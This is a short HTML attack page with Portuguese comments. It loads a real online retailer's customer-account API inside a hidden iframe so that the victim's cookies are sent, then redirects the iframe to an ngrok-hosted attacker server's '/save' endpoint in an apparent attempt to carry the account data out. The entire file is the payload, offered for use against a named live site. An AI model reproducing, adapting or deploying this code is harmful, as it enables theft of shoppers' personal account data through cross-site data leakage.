<!DOCTYPE html>
<html>
<head><title>Payload com iframe</title></head>
<body>
    <iframe id="steal" name="dataframe" style="display:none;"></iframe>

    <script>
        // Carrega o JSON da Boozt dentro do iframe (cookies serão enviados automaticamente)
        document.getElementById("steal").src = "https://www.boozt.com/at/de-at/api/customer";

        // Aguarda o conteúdo carregar (ajustável)
        setTimeout(() => {
            try {
                // window.name agora está no contexto do iframe → persiste após redirecionamento
                // Redireciona o iframe para o seu servidor Go
                document.getElementById("steal").src = "https://7e4a-2804-4580-1080-7db-1219-7096-73d0-a45e.ngrok-free.app/save";
            } catch (e) {
                console.error("Falha ao redirecionar:", e);
            }
        }, 3000); // aumenta esse tempo se a internet estiver lenta
    </script>
</body>
</html>
